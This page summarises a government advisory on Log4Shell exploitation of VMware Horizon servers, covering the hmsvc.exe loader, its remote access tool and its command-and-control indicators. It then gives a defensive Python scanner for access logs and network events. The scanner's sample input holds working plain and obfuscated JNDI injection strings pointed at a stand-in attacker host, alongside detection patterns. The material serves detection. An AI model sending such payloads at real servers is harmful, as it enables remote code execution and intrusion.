
VMware Horizon servers are exploited by

Log4Shell is a remote code execution vulnerability affecting the Apache Log4j library and a variety of products using Log4j, such as consumer and enterprise services, websites, applications, and other products, including certain versions of VMware Horizon and UAG. The vulnerability enables malicious cyber actors to submit a specially crafted request to a vulnerable system, causing the system to execute arbitrary code. The request allows the malicious actors to take full control of the affected system. (For more information on Log4Shell, see CISA's Apache Log4j Vulnerability Guidance webpage and VMware advisory VMSA-2021-0028.13.)

VMware made fixes available and confirmed exploitation in the wild. Since then, multiple cyber threat actor groups have exploited Log4Shell on unpatched, public-facing VMware Horizon and UAG servers to obtain initial access to networks.

After obtaining access, some actors implanted loader malware on compromised systems with embedded executables enabling remote C2. These actors connected to the known malicious IP address 104.223.34[.]198. This IP address uses a self-signed certificate with CN WIN-P9NRMH5G6M8. In at least one confirmed compromise, the actors collected and exfiltrated sensitive information from the victim's network.

The sections below provide information CISA and CGCYBER obtained during incident response activities at two related confirmed compromises.

CGCYBER conducted a proactive threat-hunting engagement at an organization (Victim 1) compromised by actors exploiting Log4Shell in VMware Horizon. After obtaining access, the threat actors uploaded malware, hmsvc.exe, to a compromised system. During malware installation, connections to IP address 104.223.34[.]198 were observed.

CISA and CGCYBER analyzed a sample of hmsvc.exe from the confirmed compromise. hmsvc.exe masquerades as a legitimate Microsoft Windows service (the SysInternals LogonSessions software) and appears to be a modified version of SysInternals LogonSessions embedded with malicious packed code. When discovered, the analyzed sample of hmsvc.exe was running as NT AUTHORITY\SYSTEM, the highest privilege level on a Windows system. It is unknown how the actors elevated privileges.

hmsvc.exe is a Windows loader containing an embedded executable, 658_dump_64.exe. The embedded executable is a remote access tool that provides an array of C2 capabilities, including the ability to log keystrokes, upload and execute additional payloads, and provide graphical user interface (GUI) access over a target Windows system's desktop. The malware can function as a C2 tunneling proxy, allowing a remote operator to pivot to other systems and move further into a network.
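The page names two things a defender can hunt for: the Log4Shell request itself (a `${jndi:...}` lookup arriving in an HTTP field that Horizon or UAG logs) and the post-exploitation indicators from the compromise (the C2 IP, its self-signed certificate CN, and the file names hmsvc.exe and 658_dump_64.exe). The script below is an added example written for this page, not code from CISA, CGCYBER or VMware. It goes beyond the text in one respect: real probes usually hide the `jndi` keyword behind nested lookups such as `${${lower:j}ndi:...}` or `${${::-j}${::-n}...}`, which a plain string match misses, so the scanner resolves those lookups inside-out the way Log4j would before matching. The access-log lines and EDR-style network events are constructed sample input; the only real indicators are the ones quoted above. Treating `env:`/`sys:` keys as unset (so their `:-` default wins) is an assumption.

```python
import ntpath
import re

# Indicators named in the advisory text above (IP undefanged here so it can be matched).
IOC_IPS = {"104.223.34.198"}
IOC_CERT_CNS = {"WIN-P9NRMH5G6M8"}
IOC_FILENAMES = {"hmsvc.exe", "658_dump_64.exe"}

# An innermost ${...} lookup: nothing nested inside it.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
_JNDI_OPEN, _JNDI_CLOSE = "\x01", "\x02"
_JNDI = re.compile(r"\$\{jndi:([a-z]+)://([^}]*)\}", re.IGNORECASE)


def _resolve(expr: str) -> str:
    """Evaluate one innermost lookup just far enough to undo the usual
    Log4Shell obfuscations. Assumption: env/sys/etc. keys are unset, so the
    ':-' default is what the vulnerable library would substitute."""
    name, _, key = expr.partition(":")
    name = name.lower()
    if name == "jndi":                 # the dangerous one: keep it, stop rescanning it
        return _JNDI_OPEN + key + _JNDI_CLOSE
    if name == "lower":                # ${lower:J} -> j
        return key.lower()
    if name == "upper":                # ${upper:j} -> J
        return key.upper()
    if ":-" in expr:                   # ${env:NOPE:-j} and ${::-j} -> j
        return expr.split(":-", 1)[1]
    return ""                          # unknown lookup with no default: drops out


def normalize_lookups(text: str) -> str:
    """Resolve nested lookups inside-out until only ${jndi:...} remains."""
    while True:
        resolved = _INNERMOST.sub(lambda m: _resolve(m.group(1)), text)
        if resolved == text:           # every pass removes a lookup, so this terminates
            break
        text = resolved
    return re.sub("\x01([^\x02]*)\x02", r"${jndi:\1}", text)


def find_jndi_targets(text: str) -> list[tuple[str, str]]:
    """(scheme, target) for every JNDI lookup in a line, after de-obfuscation."""
    return [(m.group(1).lower(), m.group(2))
            for m in _JNDI.finditer(normalize_lookups(text))]


def scan_access_log(lines) -> list[tuple[int, str, str]]:
    """Flag every access-log line (1-based number) that carries a JNDI lookup."""
    return [(n, scheme, target)
            for n, line in enumerate(lines, 1)
            for scheme, target in find_jndi_targets(line)]


def match_iocs(events) -> list[dict]:
    """Annotate network events whose process name, destination IP or TLS peer
    certificate CN matches an indicator from the advisory."""
    findings = []
    for ev in events:
        hits = []
        exe = ntpath.basename(ev.get("process", "")).lower()
        if exe in IOC_FILENAMES:
            hits.append("file:" + exe)
        if ev.get("dst_ip") in IOC_IPS:
            hits.append("dst_ip:" + ev["dst_ip"])
        if ev.get("tls_cn") in IOC_CERT_CNS:
            hits.append("tls_cn:" + ev["tls_cn"])
        if hits:
            findings.append({"host": ev["host"], "process": ev["process"],
                             "user": ev.get("user"), "indicators": hits})
    return findings


# Constructed sample input: a benign request, then four probes using the
# plain, lower:, ::- and env:-default obfuscation styles (User-Agent and URL).
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [11/Dec/2021:03:14:22 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [11/Dec/2021:03:15:01 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.7 - - [11/Dec/2021:03:15:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/b}"',
    '198.51.100.7 - - [11/Dec/2021:03:15:17 +0000] "GET /portal/?x=${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.7:1099/c} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.7 - - [11/Dec/2021:03:15:30 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${env:NOPE:-j}ndi:dns://198.51.100.7/d}"',
]

# Constructed EDR-style outbound connection events (hostnames and paths are invented).
SAMPLE_NET_EVENTS = [
    {"host": "HZN-CS01", "user": "NT AUTHORITY\\SYSTEM", "process": "C:\\Windows\\Temp\\hmsvc.exe",
     "dst_ip": "104.223.34.198", "dst_port": 443, "tls_cn": "WIN-P9NRMH5G6M8"},
    {"host": "HZN-CS01", "user": "NT AUTHORITY\\SYSTEM", "process": "C:\\Windows\\System32\\svchost.exe",
     "dst_ip": "10.0.5.20", "dst_port": 443, "tls_cn": "update.corp.example"},
    {"host": "WKS-042", "user": "CORP\\alice", "process": "C:\\Users\\alice\\Downloads\\658_dump_64.exe",
     "dst_ip": "203.0.113.9", "dst_port": 8443, "tls_cn": "example.test"},
]

if __name__ == "__main__":
    for n, scheme, target in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"line {n}: JNDI lookup via {scheme} to {target}")
    for f in match_iocs(SAMPLE_NET_EVENTS):
        print(f"{f['host']} {f['process']} ({f['user']}): {', '.join(f['indicators'])}")
```

Feed real Horizon or UAG access logs into `scan_access_log` and proxy, firewall or EDR connection records into `match_iocs`; the target host in each JNDI hit is the attacker's LDAP/RMI/DNS listener and is itself worth blocking and searching for in outbound connection logs, since a successful exploit makes the server fetch its payload from there. Resolving the lookups rather than regex-matching `jndi` directly is the important design choice: the obfuscated forms in lines 3 to 5 contain no literal `jndi` at all.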